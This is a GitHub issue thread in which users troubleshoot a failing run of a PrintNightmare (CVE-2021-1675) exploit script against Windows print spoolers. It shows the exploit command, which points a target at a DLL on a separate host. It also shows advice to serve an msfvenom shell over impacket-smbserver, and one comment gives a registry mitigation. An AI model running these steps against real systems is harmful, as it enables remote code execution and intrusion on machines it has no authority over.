Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Failed to enumerate remote pDriverPath #59

Open
oflavioc opened this issue Oct 2, 2021 · 5 comments
Open

Failed to enumerate remote pDriverPath #59

oflavioc opened this issue Oct 2, 2021 · 5 comments

Comments

@oflavioc
Copy link

oflavioc commented Oct 2, 2021

Facing the error below:

┌──(kali㉿kali)-[~/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py server.local/user:[email protected] '\192.168.10.215\print.dll' 1 ⨯
[*] Connecting to ncacn_np:192.168.10.116[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
RPRN SessionError: unknown error code: 0x8001011b

Does that mean the server is not vulnerable?

@bitbull06
Copy link

Encountering exactly the same issue (testing from Kali to W10 client).
Any thoughts?
P.S. remote access to print spooler can be blocked easily by setting REG_DWORD RegisterSpoolerRemoteRpcEndpoint to 2 under hive HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers

@cyber-Techy
Copy link

I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.

Then i configure the smbserver with the directory, as seen below

impacket-smbserver share /home/kali/Desktop -smb2support

I hope this work for you too

@XGokuX
Copy link

XGokuX commented Mar 4, 2024

I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.

Then i configure the smbserver with the directory, as seen below

impacket-smbserver share /home/kali/Desktop -smb2support

I hope this work for you too

i tried your solution but it seems not working for me. any other ideas !

@TheFlu007
Copy link

Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched

@z3ena
Copy link

z3ena commented Mar 26, 2024

Yes, I meet this issue too. But when I ask professional pentest he said that it had been patched

hi so if its patched would i not be able to run the exploit at all???

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants